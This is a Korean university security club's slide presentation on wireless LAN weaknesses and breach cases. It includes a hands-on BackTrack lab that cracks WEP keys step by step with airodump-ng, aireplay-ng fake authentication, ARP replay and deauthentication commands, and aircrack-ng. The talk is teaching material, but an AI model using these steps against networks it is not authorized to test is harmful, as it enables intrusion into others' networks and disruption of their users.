WLAN의 취약점과 백트랙 SKKU 정보보안 동아리 H.I.T..

Slides:



Advertisements
Similar presentations
무선 네트워크 경일대학교 컴퓨터 공학부 이 지훈 이 시욱.
Advertisements

을지대학교 무선 네트워크 사용 방법 2010 년 06 월 01 일. 을지대학교 무선 네트워크 사용 방법 1. PC 무선랜 카드 활성화 및 체크 1 단계 : 시작 -> 설정 -> 네트워크 설정 2 단계 : 무선 네트워크 설정 선택 -> 마우스 버튼 오른쪽 클릭 -> 사용.
① KT 무선랜 사용자 설명서 ( 학내 구성원 ) ollehWiFi 접속방법 1) 스마트 기기의 Wi-Fi 상태 ON 2) Wi-Fi 목록 중 [ollehWiFI] 선택 ( 아이콘에 좌물쇠 모양이 없는 공개된 ollehWiFi 를 선택 ) 2. ollehwiFi.
1 유선네트워크 (Wired Local Area Network) Window 7 기준으로 작성되었으며, 다른 버전은 전화문의 바랍니다. 1. 제어판  보기기준 ‘ 범주 ’ 로 선택 2.‘ 네트워크 및 인터넷 ’ 클릭 4.‘ 어댑터 설정 변경 ’ 클릭 3.‘ 네트워크 및.
불특정 공격에 무너진 H 사 업무 시스템 서서히 저하 내부에서 원인 불명으로 네트워크의 속도가 서서히 저하 되는 현상이 발생 공격의 발생 핵심 장 비 서비스가 되다 되지 않는 현상이 심해지고 결국 핵심 장 비는 장애가 발생하게 됨 장비 장애 발생 핵심 장비 장애 전체.
1 ⓒ 2010 U+ Corporation 컨버전스사업단 / Smart Biz. 사업부 / U+zone 사업 팀 대학 내 U+zone 접속 방법 관련 1. “ U+village” SSID 를 사용 접속방법 (LG, KT, SKT) - 접속방법 ① 자사 / 타사 관계 없이.
HTTPS Packet Capture Tutorial
Format String Attack! 포맷 스트링 공격 경일대학교 사이버보안학과 학년 남주호.
Secure Coding 이학성.
목차 Contents 무선인터넷용 비밀번호 설정방법 Windows 7 Windows 8 Windows XP MAC OS.
정보 보안 개론과 실습 네트워크 해킹과 보안 3부 해킹 전 정보 획득 Chapter 10. 목록화.
단계 1 : 화면 아이콘 [설정]을 터치 합니다. 단계 2 : [WI-FI]메뉴를 터치 합니다.
11. 무선랜 인증 및 암호화시스템 11.7 스마트폰 아이폰(아이패드)에서 사용 방법(1)
안성시립도서관 무선랜 사용자 Mac 확인 및 설정방법
1 WLAN 보안. 2 WLAN Security Requirements for Secure Wireless LANs –Authentication –Access Control –Data Privacy –Data Integrity –Protection Against Replay.
네트워크 기술을 통한 현재와 미래 소개.
제어판 –> 네트워크 및 인터넷 –> 네트워크 및 공유센터 이동 후 화면에서 “새 연결 또는 네트워크 설정” 클릭
9 스푸핑.
김태원 심재일 김상래 강신택. 김태원 심재일 김상래 강신택 인터넷 통신망의 정보를 제공하는 서비스 인터넷의 자원 및 정보는 NIC가 관리 IP주소 또는 도메인으로 정보 검색 이용자 및 통신망 관한 정보를 제공.
㈜디아이씨 SSLVPN 협력사 접속방법 2017년 4월.
Android Wi-Fi Manual (Guest용)
Wireless LAN Security.
SSL - VPN 사용자 가이드 - IT 지원실 네트워크 운영팀 -.
Penetration Testing 명지대학교 홍석원
HeartBleed.
DPR-1630&1615 IP공유기 셋팅 방법 고객지원팀 작성자 : 정청석.
18장. 방화벽 컴퓨터를 만들자.
발표자 : 손충호 조원 : 유진우, 노유성, 조사랑, 손충호
단계 1 : 화면 아이콘 [설정]을 터치 합니다. 단계 2 : [WI-FI]메뉴를 터치 합니다.
12 무선 네트워크 보안과 취약점.
무선 네트워크 해킹과 보안 발표 구조 : 네트워크 기초 -> 무선 기초 -> 보안 기초 -> 해킹 시연 -> 방지 방법 김태욱.
Chapter 13 Wired LANs: Ethernet.
무선인터넷 보안기술 컴퓨터공학부 조한별.
Android 시리즈 H2O SIM Card 데이터 사용 설정 방법
컴퓨터 네트워크 II - 기말고사 토폴로지 발표자료
Part 4 네트워크 해킹 16장 무선 네트워크 김 미 진.
8장. 원격지 시스템 관리하기.
FTP 프로그램 채계화 박재은 박수민.
(개정판) 뇌를 자극하는 Red Hat Fedora 리눅스 서버 & 네트워크
WOL(Wake-On Lan) 컴퓨터공학과 4학년 박기웅.
IPAD2(ios 5.0.1) 사용자 메뉴얼 Mobile Service Team.
10장. 무선 LAN의 기본개념과 설정방법 2012년 2학기 중부대학교 정보보호학과 이병천 교수.
12 무선 네트워크 보안과 취약점.
WIN32 API 대전 TETRIS 시스템제어 허준호 박정욱 손경원 신동헌.
WZC 무선 연결 방법 (Windows XP Ver.).
Wi-Fi 취약점 분석 본 프로젝트는 Wi-Fi 환경에서의 취약점 분석을 위한 프로젝트로 다양한 공격방법을 테스트
인터넷 은행의 역할 現 핀테크포럼 의장 페이게이트 대표 박소영.
Case-Study (Malware Detection)
KERBEROS.
(DDOS & Massive SQL Injection)
1. 인증서버 :일반유선PC( 접속“CA관리” 클릭
S-Work 2.0 DRM 신규 버전 설치 가이드 SOFTCAMP
홈 네트워크 시스템 Home Network System.
LAN의 구성요소 학습내용 서버 클라이언트 NIC(Network Interface Card) 전송매체
WZC 무선 연결 방법 (Windows 7 Ver.).
Wireless Media The Wireless LAN
JSP Programming with a Workbook
시스템 인터페이스 Lab1 X-window 및 명령어 사용.
1. Vista Wireless LAN 설정하기
무선랜 사용자 설명서 (Windows Vista 사용자).
채팅 및 파일전송 프로그램 권 경 곤 김 창 년.
CCIT 네트워크 발표 정보보호학과 평문 사이트와 SSL 사이트, SSL strip과 데이터 변조를 이용한 로그인 취약점
방승욱 여은수 민세훈 해킹.
1. PortBlock 이란 RJ-45 물리 블록킹 개념 RJ-45 블록킹 Site별 전용 Key
MAC OS 무선 접속 방법.
6 객체.
ARP.
10장. 무선 LAN의 기본개념과 설정방법 중부대학교 정보보호학과 이병천 교수.
XSS 취약점을 이용한 웹메일 해킹
홈 네트워크 시스템 Home Network System.
Presentation transcript:

WLAN의 취약점과 백트랙 SKKU 정보보안 동아리 H.I.T.

목차 WLAN을 공격하는 이유 Wireless Network? 해킹 사고 사례 BACKTRACK 실습

WLAN을 공격하는 이유 유선 네트워크에 비해 상대적으로 약한 보안 Broad Casting 전파가 도달 가능한 거리에 있는 경우 어디에서든지 스니핑과 침투 공격이 가능함

WLAN을 공격하는 이유 공격자 위치 추적의 어려움 너무나도 많은 AP들 자동차, 자전거 심한 경우 마트 카트 로켓, 등 이동수단을 이용하여, 이동하며 무선랜 지역을 찾고 Sniffing하는 행위가 빈번히 발생

WLAN을 공격하는 이유

Wireless Network? IEEE 802.11 구성요소 AP = Access Point Client SSID란? 무선네트워크에서 각각의 네트워크를 구별시키는 식별자

Wireless Network?

해킹 사고 사례 - 1 TJX Companies, INC 2007년 고객정보 유출 사건 언론에 공대 피해규모 : 신용카드 정보를 포함한 최소 4,570만건 의 고객정보

해킹 사고 사례 - 2

해킹 사고 사례 - 3 무선랜 보안의 취약함 2009년 국제 해킹대회인 “코드게이트” 에서 보안설정을 강력하게 해놓은 무선랜 해킹 문제를 한 팀에서 23분여 만에 해킹에 성공함 가장 낮은 보안 단계인 WEP는 털리는데 60sec 미만 WPA도 GPU나 여러 개의 CPU 사용으로 터는 시간이 단축

WLAN Hacking Tools

BACKTRACK All in One!! == BackTrack

WLAN 해킹의 유형 도청 서비스 거부 공격 [DDoS] 중간자 공격 세션 가로채기 [Session Hijacking]

WLAN 해킹의 유형

WLAN 해킹의 유형 불법/비인가 Clients 불완전 요소 제거 무선 네트워크 직접공격

WLAN 해킹의 유형 Rogue AP (= HoneySpot) 추적 위협 제거 공인된 사용자 정보 획득

백트랙을 이용한 WEP Password 탈취 실습 백트랙 LAN 모드를 Monitor 모드로 변경 자신의 단말 장치로 날라오는 모든 패킷을 수집할 수 있게 된다. 주변 AP 확인 Airodump-ng –w [파일 이름] mon0

백트랙을 이용한 WEP Password 탈취 실습 주변 AP확인 후 공격할 AP 정한다. 이 때 자신의 MAC 주소도 기억

백트랙을 이용한 WEP Password 탈취 실습 Target AP dump 실행 airodump-ng --bssid [AP 맥 주소] -c [채널] -w [저장할 파일 이름] mon0 dump를 이용하면 cap파일이 생성되면서 정보들이 cap파일에 저장되고 이 저장된 파일(IV들)을 이용해서 키를 알아내게 된다.

백트랙을 이용한 WEP Password 탈취 실습 가짜 인증 aireplay-ng -1 0 -e [AP 이름] -a [AP 맥 주소] -n [공격자 맥 주소] mon0 내가 공격을 하려는 AP로 공격자의 AP가 접속이 되어 있는 상태가 된다.

백트랙을 이용한 WEP Password 탈취 실습 Arp request replay attack aireplay-ng -3 -b [AP 맥 주소] -n [공격자 맥 주소] mon0 공격을 위해 패스워드 길이에 따라 2~8만개의 패킷을 수집해야 한다. 해당 공격으로 data값이 증가하면서 IV 확보가 쉬워짐 트래픽이 있어야 가능한 공격이므로 aireplay-ng -0 1 -a [AP MAC 주소] mon0을 수행해서 트래픽을 발생

백트랙을 이용한 WEP Password 탈취 실습

백트랙을 이용한 WEP Password 탈취 실습 재인증 aireplay-ng -0 1 -a [AP 맥 주소] mon0 Crack aircrack-ng [위에서 저장한 dump파일 확장자는 cap

백트랙을 이용한 WEP Password 탈취 실습 백트랩에 들어있는 다양한 공격 옵션들 aireplay <option> <replay interface> -0 : deauthentication -1 : Fake authentication -2 : Interactive Packet replay -3 : ARP request replay attack -4 : KoreK chopchop attack -5 : Fragmentation attack -6~-8 : 현재 개발 중인 다른 공격 기법이 들어갈 자리 -b bssid : AP의 MAC 주소가 bssid인 패킷으로 제한(-4, -5 사용시) -a bssid : AP MAC 주소 입력 -h smac : 공격자 MAC 주소 입력

백트랙을 이용한 WEP Password 탈취 실습 그 외 백트랙의 다양한 공격 기법 http://pmguda.com/699 Caffe-Latte Attack 시연 동영상 http://ntlab.egloos.com/2482499

결론

감사합니다!! 발표자 : 장동훈 질문은 술자리에서 하는 것이네 친구… shings47@naver.com Shings47.tistroy.com @Hyena_anthem 전쟁 1섭 아즈샤라 사냥꾼Lv.80 폭탄마 드루이드Lv.80 달려라야수왕 주술사Lv.73 자연왕